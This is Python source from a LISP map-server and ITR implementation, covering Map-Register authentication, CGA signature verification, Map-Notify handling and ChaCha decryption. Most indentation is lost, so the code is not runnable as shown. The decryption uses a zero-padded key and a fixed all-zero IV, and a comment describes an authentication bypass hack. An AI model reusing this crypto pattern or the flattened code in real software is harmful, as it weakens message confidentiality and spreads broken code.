# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.local_bit = True
rloc_record.probe_bit = False
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xTR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This function will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations looking for RTRs.
#
# We store in a dictionary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in list(sg_site_eid.individual_registrations.values()):
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = list(temp_set.values())
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set).
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead of the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs found.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None if not
# found, or the RLOC-record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if ("signature" not in json_sig): continue
return(rloc_record)
#endfor
return(None)
#enddef
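#
# For reference, the JSON searched for above looks like the following
# (sample values, base64 signature elided), matching the keys used here
# and in lisp_verify_cga_sig():
#
# {"signature-eid": "fd4f::9430", "signature": "<base64-signature>"}
#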
#
# lisp_get_eid_hash
#
# From an EID, return the EID hash value. The examples below show the
# low-order eid_hash_len bits of the EID extracted as the EID-hash:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, old_div(hash_mask_len, 16)):
addr = address & 0xffff
addr = hex(addr)[2::]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2::]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
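#
# Runnable sketch of the word extraction above (hypothetical helper; whole
# 16-bit words only, mirroring the first loop in lisp_get_eid_hash()):
#
def example_eid_hash_words(address, hash_mask_len):
    words = []
    for i in range(hash_mask_len // 16):
        words.insert(0, "{:04x}".format(address & 0xffff))
        address >>= 16
    #endfor
    return(":".join(words))
#enddef
#
# example_eid_hash_words(0xfd4f5b9ff67c6dbd379948e1c6a29430, 80) returns
# "6dbd:3799:48e1:c6a2:9430", matching the eid_hash_len = 80 line above.
#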
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_eid, pubkey, True/False]. Values can be None, but the last
# boolean indicates whether the hash lookup succeeded.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if ("public-key" not in json_pubkey): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use the signature-eid if present in the JSON string. Otherwise, the
# crypto-EID is the signature-EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif ("signature-eid" in sig):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping database to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer and a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data.encode(), hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
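#
# Round-trip sketch of the signer/verifier pairing described above
# (hypothetical helper; requires the 'ecdsa' package and curve NIST256p so
# that sha256 may be used as the hashfunc):
#
def example_cga_sign_and_verify(sig_data):
    import ecdsa, hashlib
    key = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
    sig = key.sign(sig_data.encode(), hashfunc=hashlib.sha256)
    return(key.verifying_key.verify(sig, sig_data.encode(),
        hashfunc=hashlib.sha256))
#enddef
#
# example_cga_sign_and_verify("[1000]fd4f::9430") returns True; the string
# follows the "[<iid>]<eid>" form the signature is computed over.
#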
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the concatenation of the Map-Notify nonce
# (in hex) and the xTR address.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non-encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse the first 4 bytes, which are not encrypted. If the packet is not
# encrypted, return to caller. If it is encrypted, get the 3-bit key-id
# next to the e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
#
# Use 20 rounds so we can interoperate with ct-lisp mobile platforms.
#
plaintext = chacha.ChaCha(ekey, iv, 20).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
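#
# lisp_crypt_map_register_sketch
#
# Illustrative sketch, not called anywhere: the encrypt counterpart of the
# decrypt logic above, mirroring lisp_send_map_register(). The key is
# zero-filled to 32 string characters (a 16-byte key), the IV is 8 zero
# characters, and 20 rounds are used so both sides interoperate.
#
def lisp_crypt_map_register_sketch(packet, ekey):
    ekey = ekey.zfill(32)
    iv = "0" * 8
    ciphertext = chacha.ChaCha(ekey, iv, 20).encrypt(packet[4::])
    plaintext = chacha.ChaCha(ekey, iv, 20).decrypt(ciphertext)
    return(packet[0:4] + plaintext)
#enddef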
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
    # First check if we are expecting an encrypted Map-Register. This call
    # will either return an unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (key_id in site.auth_key):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
        # If merge is being requested, get the individual site-eid. If not,
        # and what was cached had the merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
            # Clear out all registrations; there is a new site-id registering,
            # or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = map_register.xtr_id
if (key in site_eid.individual_registrations):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
        # If TTL is 0, unregister entry if source of Map-Register is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (addr_str not in site.allowed_rlocs):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
        # Send Map-Notify if the RLOC-set changed for this site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
peid_record = copy.deepcopy(eid_record)
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, peid_record, start_rloc_records,
site_eid.eid, site)
#endfor
#
    # Send Map-Notify to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_unicast_map_notify
#
# Have ITR process a Map-Notify as a result of sending a subscribe-request.
# Update map-cache entry with new RLOC-set.
#
def lisp_process_unicast_map_notify(lisp_sockets, packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
        if (eid_records == None): return
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# If no map-cache entry exists or does not have action LISP_SEND_
# PUBSUB_ACTION, ignore.
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.eid)
if (mc == None):
e = green(eid_str, False)
lprint("Ignoring Map-Notify EID {}, no subscribe-request entry". \
format(e))
continue
#endif
#
# Check if map-cache entry is configured subscribe-request entry.
# Otherwise, it is an entry created from the subscribe-request entry
# from a returned Map-Notify.
#
if (mc.action != LISP_SEND_PUBSUB_ACTION):
if (mc.subscribed_eid == None):
e = green(eid_str, False)
lprint("Ignoring Map-Notify for non-subscribed EID {}". \
format(e))
continue
#endif
#endif
#
# Check if this is the map-cache entry for the EID or the SEND_PUBSUB
# configured map-cache entry. Reuse the memory if the EID entry exists
        # and empty the RLOC-set since we will rebuild it.
#
old_rloc_set = []
if (mc.action == LISP_SEND_PUBSUB_ACTION):
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
subscribed_eid = copy.deepcopy(eid_record.eid)
subscribed_group = copy.deepcopy(eid_record.group)
else:
subscribed_eid = mc.subscribed_eid
subscribed_group = mc.subscribed_group
old_rloc_set = mc.rloc_set
mc.delete_rlocs_from_rloc_probe_list()
mc.rloc_set = []
#endif
#
# Store some data from the EID-record of the Map-Notify.
#
mc.mapping_source = None if source == "lisp-itr" else source
mc.map_cache_ttl = eid_record.store_ttl()
mc.subscribed_eid = subscribed_eid
mc.subscribed_group = subscribed_group
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(old_rloc_set) != 0 and eid_record.rloc_count == 0):
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(eid_str, False)))
continue
#endif
#
# Now add all RLOCs to a new RLOC-set. If the RLOC existed in old set,
        # copy old RLOC data. We want to retain uptimes, stats, and RLOC-
# probe data in the new entry with the same RLOC address.
#
new = replaced = 0
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
#
# See if this RLOC address is in old RLOC-set, if so, do copy.
#
found = False
for r in old_rloc_set:
if (r.rloc.is_exact_match(rloc_record.rloc)):
found = True
break
#endif
#endfor
if (found):
rloc = copy.deepcopy(r)
replaced += 1
else:
rloc = lisp_rloc()
new += 1
#endif
#
# Move data from RLOC-record of Map-Notify to RLOC entry.
#
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
mc.rloc_set.append(rloc)
#endfor
lprint("Update {} map-cache entry with {}/{} new/replaced RLOCs".\
format(green(eid_str, False), new, replaced))
#
# Build best RLOC-set and write to external data-plane, if any.
#
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
#endfor
#
# Find map-server data structure from source address of Map-Notify then
# send Map-Notify-Ack to it.
#
ms = lisp_get_map_server(source)
if (ms == None):
lprint("Cannot find Map-Server for Map-Notify source address {}".\
format(source.print_address_no_iid()))
return
#endif
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
#enddef
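#
# lisp_merge_rloc_sets_sketch
#
# Illustrative sketch, not called anywhere: the retain-old-RLOC pattern used
# above. When an RLOC address reappears in the new set, deep-copy the old
# entry first so uptimes, stats, and RLOC-probe state carry over, then
# overwrite it with the fields from the decoded RLOC-record.
#
def lisp_merge_rloc_sets_sketch(old_rloc_set, decoded_rloc_records, source):
    new_rloc_set = []
    for rloc_record in decoded_rloc_records:
        found = None
        for r in old_rloc_set:
            if (r.rloc.is_exact_match(rloc_record.rloc)):
                found = r
                break
            #endif
        #endfor
        rloc = copy.deepcopy(found) if found else lisp_rloc()
        rloc.store_rloc_from_record(rloc_record, None, source)
        new_rloc_set.append(rloc)
    #endfor
    return(new_rloc_set)
#enddef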
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process has already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
        if (eid_records == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
        # Gleaned map-cache entries always override what is registered in
        # the mapping system, since the mapping system RLE entries are RTRs
        # and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
